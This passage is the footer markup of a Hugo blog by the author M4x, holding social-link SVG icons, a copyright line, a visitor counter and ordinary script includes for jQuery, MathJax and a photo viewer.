  <path d="M664.781909 681.472759 0 97.881301C0 3.997201 71.046997 0 71.046997 0L474.477909 0 961.649408 0 1361.641813 0C1361.641813 0 1432.688811 3.997201 1432.688811 97.881301L771.345323 681.472759C771.345323 681.472759 764.482731 685.154773 753.594283 688.65053L753.594283 688.664858C741.602731 693.493018 729.424896 695.068979 718.077952 694.839748 706.731093 695.068979 694.553173 693.493018 682.561621 688.664858L682.561621 688.65053C671.644501 685.140446 664.781909 681.472759 664.781909 681.472759L664.781909 681.472759ZM718.063616 811.603883C693.779541 811.016482 658.879232 802.205449 619.10784 767.734955 542.989056 701.759633 0 212.052267 0 212.052267L0 942.809523C0 942.809523 0 1024 83.726336 1024L682.532949 1024 753.579947 1024 1348.948139 1024C1432.688811 1024 1432.688811 942.809523 1432.688811 942.809523L1432.688811 212.052267C1432.688811 212.052267 893.138176 701.759633 817.019477 767.734955 777.248 802.205449 742.347691 811.03081 718.063616 811.603883L718.063616 811.603883Z"></path>
</svg>

    </a>
  
    <a href="https://twitter.com/M4x_1997" rel="me noopener" class="iconfont"
      title="twitter"  target="_blank"
      >
      <svg class="icon" viewBox="0 0 1264 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
  <path d="M1229.8616 18.043658c0 0-117.852626 63.135335-164.151872 67.344358-105.225559-164.151872-505.082682-92.598492-437.738325 223.078185C278.622548 312.675223 89.216542 47.506814 89.216542 47.506814s-117.852626 189.406006 75.762402 345.139833C127.097743 396.85567 55.544363 371.601535 55.544363 371.601535S26.081207 535.753407 253.368414 615.724832c-21.045112 29.463156-113.643603 8.418045-113.643603 8.418045s25.254134 143.10676 231.496229 180.987961c-143.10676 130.479693-387.230056 92.598492-370.393967 105.225559 206.242095 189.406006 1119.599946 231.496229 1128.01799-643.98042C1179.353331 249.539887 1263.533778 123.269217 1263.533778 123.269217s-130.479693 37.881201-138.897738 33.672179C1225.652577 98.015083 1229.8616 18.043658 1229.8616 18.043658"></path>
</svg>

    </a>
  
    <a href="https://github.com/bash-c" rel="me noopener" class="iconfont"
      title="github"  target="_blank"
      >
      <svg class="icon" style="" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
  <path d="M512 12.672c-282.88 0-512 229.248-512 512 0 226.261333 146.688 418.133333 350.08 485.76 25.6 4.821333 34.986667-11.008 34.986667-24.618667 0-12.16-0.426667-44.373333-0.64-87.04-142.421333 30.890667-172.458667-68.693333-172.458667-68.693333C188.672 770.986667 155.008 755.2 155.008 755.2c-46.378667-31.744 3.584-31.104 3.584-31.104 51.413333 3.584 78.421333 52.736 78.421333 52.736 45.653333 78.293333 119.850667 55.68 149.12 42.581333 4.608-33.109333 17.792-55.68 32.426667-68.48-113.706667-12.8-233.216-56.832-233.216-253.013333 0-55.893333 19.84-101.546667 52.693333-137.386667-5.76-12.928-23.04-64.981333 4.48-135.509333 0 0 42.88-13.738667 140.8 52.48 40.96-11.392 84.48-17.024 128-17.28 43.52 0.256 87.04 5.888 128 17.28 97.28-66.218667 140.16-52.48 140.16-52.48 27.52 70.528 10.24 122.581333 5.12 135.509333 32.64 35.84 52.48 81.493333 52.48 137.386667 0 196.693333-119.68 240-233.6 252.586667 17.92 15.36 34.56 46.762667 34.56 94.72 0 68.522667-0.64 123.562667-0.64 140.202666 0 13.44 8.96 29.44 35.2 24.32C877.44 942.592 1024 750.592 1024 524.672c0-282.752-229.248-512-512-512"></path>
</svg>

    </a>


<a href="https://bash-c.github.io/index.xml" rel="noopener alternate" type="application/rss&#43;xml"
    class="iconfont" title="rss" target="_blank">
    <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="30" height="30">
  <path d="M819.157333 1024C819.157333 574.592 449.408 204.8 0 204.8V0c561.706667 0 1024 462.293333 1024 1024h-204.842667zM140.416 743.04a140.8 140.8 0 0 1 140.501333 140.586667A140.928 140.928 0 0 1 140.074667 1024C62.72 1024 0 961.109333 0 883.626667s62.933333-140.544 140.416-140.586667zM678.784 1024h-199.04c0-263.210667-216.533333-479.786667-479.744-479.786667V345.173333c372.352 0 678.784 306.517333 678.784 678.826667z"></path>
</svg>

  </a>
   
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - <a class="theme-link" href="https://github.com/xianmin/hugo-theme-jane">Jane</a>
  </span>

  <span class="copyright-year">
    &copy;
    
       -
    2021
    <span class="heart">
      
      <i class="iconfont">
        <svg class="icon" viewBox="0 0 1025 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="14" height="14">
  <path d="M1000.1 247.9c-15.5-37.3-37.6-70.6-65.7-98.9-54.4-54.8-125.8-85-201-85-85.7 0-166 39-221.4 107.4C456.6 103 376.3 64 290.6 64c-75.1 0-146.5 30.4-201.1 85.6-28.2 28.5-50.4 61.9-65.8 99.3-16 38.8-24 79.9-23.6 122.2 0.7 91.7 40.1 177.2 108.1 234.8 3.1 2.6 6 5.1 8.9 7.8 14.9 13.4 58 52.8 112.6 102.7 93.5 85.5 209.9 191.9 257.5 234.2 7 6.1 15.8 9.5 24.9 9.5 9.2 0 18.1-3.4 24.9-9.5 34.5-30.7 105.8-95.9 181.4-165 74.2-67.8 150.9-138 195.8-178.2 69.5-57.9 109.6-144.4 109.9-237.3 0.1-42.5-8-83.6-24-122.2z"
   fill="#8a8a8a"></path>
</svg>

      </i>
    </span><span class="author">
        M4x
        
      </span></span>

  
  
    <span id="busuanzi_container">
      访客数/访问量：<span id="busuanzi_value_site_uv"></span>/<span id="busuanzi_value_site_pv"></span>
    </span>
  

  
</div>

    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont">
        
        <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="35" height="35">
  <path d="M510.866688 227.694839 95.449397 629.218702l235.761562 0-2.057869 328.796468 362.40389 0L691.55698 628.188232l241.942331-3.089361L510.866688 227.694839zM63.840492 63.962777l894.052392 0 0 131.813095L63.840492 195.775872 63.840492 63.962777 63.840492 63.962777zM63.840492 63.962777"></path>
</svg>

      </i>
    </div>
  </div>
  
<script type="text/javascript" src="/lib/jquery/jquery-3.2.1.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout-1.0.1.min.js"></script>




<script type="text/javascript" src="/js/main.638251f4230630f0335d8c6748e53a96f94b72670920b60c09a56fdc8bece214.js" integrity="sha256-Y4JR9CMGMPAzXYxnSOU6lvlLcmcJILYMCaVv3Ivs4hQ=" crossorigin="anonymous"></script>



  <script type="text/javascript">
    window.MathJax = {
      showProcessingMessages: false,
      messageStyle: 'none'
    };
  </script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML' async></script>









  
    <script type="text/javascript" src="/js/load-photoswipe.js"></script>
    <script type="text/javascript" src="/lib/photoswipe/photoswipe.min.js"></script>
    <script type="text/javascript" src="/lib/photoswipe/photoswipe-ui-default.min.js"></script>
  




  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>












</body>
</html>
